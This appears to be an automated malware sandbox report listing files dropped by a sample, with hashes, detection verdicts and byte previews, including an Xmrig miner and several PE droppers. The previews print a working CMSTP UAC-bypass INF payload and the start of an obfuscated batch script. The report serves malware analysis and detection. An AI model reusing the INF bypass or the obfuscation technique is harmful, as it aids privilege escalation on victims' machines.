                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAAFF.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):155648
                                                                                      Entropy (8bit):0.5407252242845243
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpABEA.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAC0B.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):5242880
                                                                                      Entropy (8bit):0.03859996294213402
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Client (1).vmp.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):463360
                                                                                      Entropy (8bit):7.5950208702429896
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:jCzQTYz4iqlcVgmItDwnBPRS4e7sKtj6f3Fjgf2RtDn6prNP75Jzdjx:28TYz4aXQj473Fj1D6Tzd
                                                                                      MD5:A4E804239AE09E3A23A4020C226B188C
                                                                                      SHA1:577169AACE1DE8A58549E8D2144238756DE0C22E
                                                                                      SHA-256:854B910EF8132D02B501360793F50DBB3F522B31C69FEFE3222EBEBA5E5A4DD1
                                                                                      SHA-512:B4BC862DAC9113B18FE9292C28D5C5F532F6316759F06A4910C1FE96E69DB692FDED455A94B1F41E5B4FFC43C01602E5655CE9220036A9DEB05D60871CF94EED
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                                                      • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ML.f................................. ........@.. .......................@..................................................(............................ ..........................................................................H............text...T.... ...................... ..`.Z`q....w........................... ..`.![@................................@....p0O................................ ..`.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\explorer.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Winscreen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):579072
                                                                                      Entropy (8bit):7.7638872936284224
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:wQYA/YW3i6FYnFnE171sq7Cat0U3TAiL5D:wQviE171+U3T35
                                                                                      MD5:753F5F61C1F444BB1524A26C0DF29F38
                                                                                      SHA1:DD54413195EC0EB3B1C13D9AF59015BE94CF0C4F
                                                                                      SHA-256:A90D91ED90C21D02436F2D1A1A31550E432A70D393A9A1A18D6AAF7BD0EDB13F
                                                                                      SHA-512:08C58762D2A645F1EE7C60F3F56638CE12360FE502D9488A52F4C49A2E64F2FFBED9DF852F7828694A1BA8B450CD738111FF56B7E0A8BB4FC8B508607DF8B427
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................. ..........`.... ...@....@.. ....................................@.....................................(....`...............................................................................`..............._..H............text........ ...................... ..`.nK\....+....@...................... ..`.)Fk.........`......................@....&|8....8........................... ..`.rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\tasklog\taskmen.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1006080
                                                                                      Entropy (8bit):7.86899484111889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+4yj0Z3aVJn8XkCd8Vm/43luAOagSkkbkMaABXWQ8rzMnZ7rZ2HX/vq9fELsDq7g:+4yj0Z3GJhYwlurxSH6QnZxneLS2WF
                                                                                      MD5:EFA5846830C8A002235AC1768295C1B9
                                                                                      SHA1:9822CB1A27AC6B7B74653619E1134EC7817A0959
                                                                                      SHA-256:3E9933AF0D5EA0F16393BFFC0D6E3EE95E7F5B84064F29BEDEB8F01D0B89E349
                                                                                      SHA-512:A2009A97D28C7BA9B39C2BA196C3A97A66E56458D34E9C39EB2ADB00C246C41849B74EAF9E1DD2CDEB01DCE64AC00BB13FA560185BE41EF0602F9F922DF87DF6
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X_h..........."...0.................. ........@.. ....................... #...........`....................................(.....".......................#......................................................................!.H............text...T.... ...................... ..`.BYK................................ ..`.7'g................................@....{a".....8.......:.................. ..`.rsrc........."......@..............@..@.reloc........#......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\taskmoder.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Winscreen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):502784
                                                                                      Entropy (8bit):7.453124949467484
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:67+Htqk6/h+CncPJo6jvzw9nLsbG/w5jlQ2OCpsNziLkYR8pDewPIQgxmgM:Ke6KJd/Yw5R5OygiLzMDe5QSm
                                                                                      MD5:2A48F51475C2EB426B304DDDCF3F85F5
                                                                                      SHA1:6ABEFDC74A28E423ADC87B5E8526B4237504EB02
                                                                                      SHA-256:77554684765E35E52DF96CA6430F312AC5BA940F98E2DFCFF09EA2B6DAD140E8
                                                                                      SHA-512:6117EE6649C1A921C69D4DBF865AB14E95D68C4EEB840FAAE388726930726FBC220E73C208ED13238E2ECB69EAB2C35550906C937F0F7B869034CA3282145DC7
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\taskmoder.exe, Author: Joe Security
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J............"...0.................. ... ....@.. ....................................`.................................\...(....@.......................`.......................................................................v..H............text........ ...................... ..`.m[{.....V... ...................... ..`..su................................@....cBp................................ ..`.rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\upx.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Winscreen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5632
                                                                                      Entropy (8bit):4.170551119283864
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:GHCAn6kcIIlokpFwCKpS4K7IVfr+dOOzNt:q5YokpF+p0IVf5I
                                                                                      MD5:78CC94F417D1BE1A25ACE9F52D52E23D
                                                                                      SHA1:CEB888255D6D2D226C91E01E448BB08EE3394206
                                                                                      SHA-256:BE31D2BA31A3B208E2454A955E36FAC6C75D0A7A1BA86AC84EA815C6EBFA3B88
                                                                                      SHA-512:31C72E32186D0DB52B4D6D2D11749A00B5DA3618FCD56EE569B7FD3A7F1300F138E0B7C4F625C616373574A9EAF8B9A5F486B8CE13B10A928BAB8C984A7E3A3C
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."............."...0.............6*... ...@....@.. ....................................`..................................)..O....@.......................`......L)..8............................................ ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......@!...............................................................0..)...............s....s.......o......o.....(....&*....0..?........+7..~.......+.......(......,..(.....+....X....i2..(.........+...0............(...........+..*r.(........(.....(....o.....*".(.....*.......%.r...p.%.r...p.%.r-..p......*...BSJB............v4.0.30319......l.......#~......D...#Strings....`...@...#US.........#GUID.......\...#Blob...........W..........3........................................

                                                                                      C:\Users\user\Desktop\win.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.251629167387823
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N:N
                                                                                      MD5:EC1DA0AD6A68916C0F65270060CC3806
                                                                                      SHA1:944498D003A207D91C61E332D12BE62F89D1CC05
                                                                                      SHA-256:D6C897090622428152C6D312210531357519315F6FDB09ACD9F4F27531A6E946
                                                                                      SHA-512:BE88B94F7978D5E00718A30F5BF3EE262F0F1C1F1C5B1208BB0E646649C90E02D49F9CC054F8936C77C3A90A2935E98FBCA3E571ED466C7E4619D51CA903409D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...

                                                                                      C:\Windows\Client.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):817664
                                                                                      Entropy (8bit):7.422292631459835
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:puDXTIGaPhEYzUzA0rW/+bmXwpXyT6deRXTGg+HT:MDjlabwz96+bmAByTdi
                                                                                      MD5:0CA491B3E2BBE82AA76F5BB94E8F2143
                                                                                      SHA1:6BEF162E8C41248AA9E8DA7F9963C71207C4BECA
                                                                                      SHA-256:461ECA324F1408932AB27FC763ECB7BBE62151F08EB5EC45774170FC07F51B16
                                                                                      SHA-512:841D600C405ED7A6BD233471EBDCF936243E44EA036C8695EBB8BEFEF7D1AC53540E1588F3118B4BE821E34E1123EABAE3B8CE65D901C431BC40CEB7071E5ACF
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 70%
                                                                                      • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...f.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                                                      C:\Windows\System32\drivers\etc\h?sts

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):825
                                                                                      Entropy (8bit):4.67315598430653
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtr:vDZhyoZWM9rU5fFcg
                                                                                      MD5:FA2ED01C7163BEC757500265833804AA
                                                                                      SHA1:1F6E6DE0AC374FE93C49959C5286BE1F80072F3A
                                                                                      SHA-256:586A51B83016446B1D541D662405F0AC2531D2AC894A4157D4BC967DF98F0C35
                                                                                      SHA-512:39D5678E538E3A0A98B24D282BB07C3AECCD65BF7F7D889BECD551D6FCDB6BE611BBE8A179CA2C241279A420EBF1225749AF2860A6921CD8AE4B72E99E90F779
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...

                                                                                      C:\Windows\Temp\05mor1jc.inf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):583
                                                                                      Entropy (8bit):5.325254776953767
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q5e0z03oqfrcFcv3Cur5poQ8aQBsBZVjk/jqJIONV8:QFzQf/iNWVA/uJIgV8
                                                                                      MD5:658B029EED8F317EE77314373A85EED5
                                                                                      SHA1:32918365BDE35E169153FCACF526D2369AFEC515
                                                                                      SHA-256:A9974F9B53D12746BCE32391A354CD6368A38744B8C9AA1335C618CF7B4DFA22
                                                                                      SHA-512:3053C8314D5EF5BCF814C7978F344094FB3A754D4AA08D95A5B9F012B5BD16698ACE0DECC3102DA4B4C30EF7A4C537B8F863AEB5ED0C05C683055E5B3B12FF8E
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Windows\Temp\05mor1jc.inf, Author: Joe Security
                                                                                      Reputation:unknown
                                                                                      Preview:[version].Signature=$chicago$.AdvancedINF=2.5..[DefaultInstall].CustomDestination=CustInstDestSectionAllUsers.RunPreSetupCommands=RunPreSetupCommandsSection..[RunPreSetupCommandsSection].; Commands Here will be run Before Setup Begins to install.cmd /c start "C:\Windows\temp\swtpd1aw.exe".taskkill /IM cmstp.exe /F..[CustInstDestSectionAllUsers].49000,49001=AllUSer_LDIDSection, 7..[AllUSer_LDIDSection]."HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""..[Strings].ServiceName="NyanCat".ShortSvcName="NyanCat"..

                                                                                      C:\Windows\Temp\swtpd1aw.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):134656
                                                                                      Entropy (8bit):7.1492386475672385
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:PbT/ReLjj8DHe2cN4XbgmNkJHTNtQoINSbI:jejTjjxtZIob
                                                                                      MD5:D11D4C3E52A34767568FA7AEAB4200A7
                                                                                      SHA1:172671382AF63ADAE567FD5DBA3CDBF2C103AAC5
                                                                                      SHA-256:4250EFFA645CBB0FAC353254B4B27DD8E2DA1D70F34701A7E3CA14A16CF20747
                                                                                      SHA-512:DA65E1FB32C408FCC58C45320EF8E2044BDACB94B35783148DC8605423D83F255709EF53559CC024E02EBD2E379D77CFB4F92BB7759725AF1A65F4802A21C2B5
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................."... ........@.. .............................."........................................!..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...L'...........................................................0..2........o......,..r...p(....-.+..(A....+..(A.......s....*...0..`.........(.....o...........+@..........ba...+%.j ....n_ ....n3...b ....a.+...b...X...2....X.......i2..*.0........... Q...X..(...... K...Y...r...po.......a....Z..[....Xj.o....&...........o....&..(.... h.-}a.dY......o....&..(.....Y /j..a.....j.o....&.............o....&...+.........a....X......i2.(.....o....*...".(.....*...>.(.......}....*

                                                                                      C:\Windows\Temp\xtm5g4p2.inf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):583
                                                                                      Entropy (8bit):5.340761318655261
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q5e0z03oqfrcFcv3Cur5ZiQ8aQBsBZVjk/jqJIONV8:QFzQf/ncNWVA/uJIgV8
                                                                                      MD5:AAB055230610C4AFAA635DD6EE2276ED
                                                                                      SHA1:7BA8376BAB5DE12AF8BBDDFC8A0F43805133318A
                                                                                      SHA-256:EA020F169C94036CA2AE6EC10DFF25DCBFD5233B9E50C1332AF657EE3074764B
                                                                                      SHA-512:F9CA0C16854FFBCCA9B43F9F300CD9DFF88B212E6BDA154D160B317D2A6E6A7BC9E7A89A6ADD5EEC7EC179FEA18E6AB1E25F941696947A11A343535757FAD13D
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Windows\Temp\xtm5g4p2.inf, Author: Joe Security
                                                                                      Reputation:unknown
                                                                                      Preview:[version].Signature=$chicago$.AdvancedINF=2.5..[DefaultInstall].CustomDestination=CustInstDestSectionAllUsers.RunPreSetupCommands=RunPreSetupCommandsSection..[RunPreSetupCommandsSection].; Commands Here will be run Before Setup Begins to install.cmd /c start "C:\Windows\temp\ydztkyrb.exe".taskkill /IM cmstp.exe /F..[CustInstDestSectionAllUsers].49000,49001=AllUSer_LDIDSection, 7..[AllUSer_LDIDSection]."HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""..[Strings].ServiceName="NyanCat".ShortSvcName="NyanCat"..

                                                                                      C:\Windows\Temp\ydztkyrb.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):134656
                                                                                      Entropy (8bit):7.1492386475672385
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:PbT/ReLjj8DHe2cN4XbgmNkJHTNtQoINSbI:jejTjjxtZIob
                                                                                      MD5:D11D4C3E52A34767568FA7AEAB4200A7
                                                                                      SHA1:172671382AF63ADAE567FD5DBA3CDBF2C103AAC5
                                                                                      SHA-256:4250EFFA645CBB0FAC353254B4B27DD8E2DA1D70F34701A7E3CA14A16CF20747
                                                                                      SHA-512:DA65E1FB32C408FCC58C45320EF8E2044BDACB94B35783148DC8605423D83F255709EF53559CC024E02EBD2E379D77CFB4F92BB7759725AF1A65F4802A21C2B5
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................."... ........@.. .............................."........................................!..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...L'...........................................................0..2........o......,..r...p(....-.+..(A....+..(A.......s....*...0..`.........(.....o...........+@..........ba...+%.j ....n_ ....n3...b ....a.+...b...X...2....X.......i2..*.0........... Q...X..(...... K...Y...r...po.......a....Z..[....Xj.o....&...........o....&..(.... h.-}a.dY......o....&..(.....Y /j..a.....j.o....&.............o....&...+.........a....X......i2.(.....o....*...".(.....*...>.(.......}....*

                                                                                      C:\Windows\fail.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:DOS batch file, ASCII text, with very long lines (38388), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):142881
                                                                                      Entropy (8bit):6.124974593760494
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:WLzmglcFSmLnvlPA3CD/J3fR2c4vWL4A1c3T0DDKADFJc2bWp3:uzmglipLnvlPA3ihv959DXcsWp
                                                                                      MD5:2B904AF8F93856FA09E6C71974533E55
                                                                                      SHA1:CC6B6DC5461934F76BCC1A22BCCD05B0E4060899
                                                                                      SHA-256:EA8A5D586DAD3A077C09B30A92440733377FE49D6C115B0A44F853A44CAC5C0E
                                                                                      SHA-512:82439F689C105A170D389B4CF06157D944F1809557B9D5A781F2AC6F4933C302338383BF1C6419835060DF6E5FA6446310C9328BA48EF9E8613B611E14A93203
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:@echo off..%PbyeBSPGGausIkEuvmVq%s%PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%t%PbyeBSPGGausIkEuvmVq%l%PbyeBSPGGausIkEuvmVq%o%PbyeBSPGGausIkEuvmVq%c%PbyeBSPGGausIkEuvmVq%a%PbyeBSPGGausIkEuvmVq%l%PbyeBSPGGausIkEuvmVq% %PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%n%PbyeBSPGGausIkEuvmVq%a%PbyeBSPGGausIkEuvmVq%b%PbyeBSPGGausIkEuvmVq%l%PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%d%PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%l%PbyeBSPGGausIkEuvmVq%a%PbyeBSPGGausIkEuvmVq%y%PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%d%PbyeBSPGGausIkEuvmVq%e%PbyeBSPGGausIkEuvmVq%x%PbyeBSPGGausIkEuvmVq%p%PbyeBSPGGausIkEuvmVq%a%PbyeBSPGGausIkEuvmVq%n%PbyeBSPGGausIkEuvmVq%s%PbyeBSPGGausIkEuvmVq%i%PbyeBSPGGausIkEuvmVq%o%PbyeBSPGGausIkEuvmVq%n%PbyeBSPGGausIkEuvmVq%..set "FRlsJeMSbCQheNLYQeQG=s"..set "KlwYwtJEXCntissfmywP=t"..set "kJoUbhFgZvRHjaTqVBOW=!FRlsJeMSbCQheNLYQeQG!e!KlwYwtJEXCntissfmywP!"..!kJoUbhFgZvRHjaTqVBOW! "BbReRwcxNe=dows"..!kJoUbhFgZvRHjaTqVBOW! "pVwZDPsmlY=:('g"..!kJoUbhFgZvRHjaTqVBOW! "tQxUOJXQLk

                                                                                      C:\Windows\win.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.251629167387823
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N:N
                                                                                      MD5:EC1DA0AD6A68916C0F65270060CC3806
                                                                                      SHA1:944498D003A207D91C61E332D12BE62F89D1CC05
                                                                                      SHA-256:D6C897090622428152C6D312210531357519315F6FDB09ACD9F4F27531A6E946
                                                                                      SHA-512:BE88B94F7978D5E00718A30F5BF3EE262F0F1C1F1C5B1208BB0E646649C90E02D49F9CC054F8936C77C3A90A2935E98FBCA3E571ED466C7E4619D51CA903409D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...

                                                                                      C:\Windows\winsin.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      File Type:DOS batch file, ASCII text, with very long lines (1462), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4582
                                                                                      Entropy (8bit):3.75312275835076
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QSblfJavQ6TV1M9XkJjFpYiW302epsHfKBIFWKL2W3VnhRikV1M9XkJjFpYiW307:bl69DvpIKkTDvpIKlhTAu3oWndSQAs
                                                                                      MD5:E0F179EAEB50266111F21197E65E7A84
                                                                                      SHA1:5220A889360C3591C3AAD883AB10D74FC82F393E
                                                                                      SHA-256:F1DDA86D56BFB87DF7F432BEA144B19A8DC24E27302BC5EB2DF9A793BE5D1B7D
                                                                                      SHA-512:702BEA9F6C4404FA2B17B6B98569781CB33CEA7A35AB33A494FA18458626C1C9348070EB9D7A10F95F6DD91DB4B32C2ADD8776BC08712B222B71FF534BB3728F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
